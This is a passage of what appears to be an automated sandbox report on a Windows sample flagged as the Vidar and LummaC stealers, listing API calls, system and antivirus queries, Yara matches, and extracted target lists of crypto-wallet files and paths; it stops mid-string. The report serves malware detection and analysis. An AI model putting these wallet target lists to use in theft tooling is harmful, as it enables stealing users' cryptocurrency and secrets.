Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	4_2_003A5E2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	5_2_00410DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoA,	5_2_0042E834
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	5_2_0042B25C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	5_2_0042B351
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	5_2_00429BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	5_2_0042B3F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	5_2_0042B453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	5_2_0042ACD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	5_2_00425573
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	5_2_0042B624
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	5_2_0042762C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: EnumSystemLocalesA,	5_2_0042B6E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	5_2_00429EFE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,	5_2_0042E6FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	5_2_00428F54
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	5_2_0042B777
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	5_2_00427706
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	5_2_0042B710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	5_2_0042B7B3
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	15_2_002EC085
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: GetLocaleInfoW,	15_2_002E622B
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: EnumSystemLocalesW,	15_2_002EC327
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: EnumSystemLocalesW,	15_2_002EC372
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: EnumSystemLocalesW,	15_2_002EC40D
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	15_2_002EC498
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: GetLocaleInfoW,	15_2_002EC6EB
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	15_2_002EC814
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: GetLocaleInfoW,	15_2_002EC91A
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	15_2_002EC9E9
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: EnumSystemLocalesW,	15_2_002E5D7F

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\VmRHSCaiyc.exe

Code function: 4_2_00357815 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

4_2_00357815

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 5_2_00410C28 GetProcessHeap,HeapAlloc,GetUserNameA,

5_2_00410C28

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 5_2_00410D03 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

5_2_00410D03

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 5_2_6D298390 NSS_GetVersion,

5_2_6D298390

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: Amcache.hve.9.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: MSBuild.exe, 00000005.00000002.1774258553.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: MsMpEng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 16.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.HCFIIIJJKJ.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.1786194225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1788163394.00000000002FD000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY

Yara detected Vidar

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 4.2.VmRHSCaiyc.exe.37dad8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.VmRHSCaiyc.exe.350000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.VmRHSCaiyc.exe.37dad8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.1773441370.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1448499890.000000000037D000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VmRHSCaiyc.exe PID: 2024, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6192, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Flash\|%DRIVE_REMOVABLE%\\|wallet.,seed.,btc.,key.,2fa.,crypto.,coin.,private.,2fa.,auth.,ledger.,trezor.,pass.,wal.,upbit.,bcex.,bithimb.,hitbtc.,bitflyer.,kucoin.,huobi.,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.\|150\|3\|windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,.mp3\|DESKTOP\|%DESKTOP%\\|wallet.,seed.,btc.,key.,2fa.,crypto.,coin.,private.,2fa.,auth.,ledger.,trezor.,pass.,wal.,upbit.,bcex.,bithimb.,hitbtc.,bitflyer.,kucoin.,huobi.,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.\|150\|2\|Windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,.mp3\|
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session 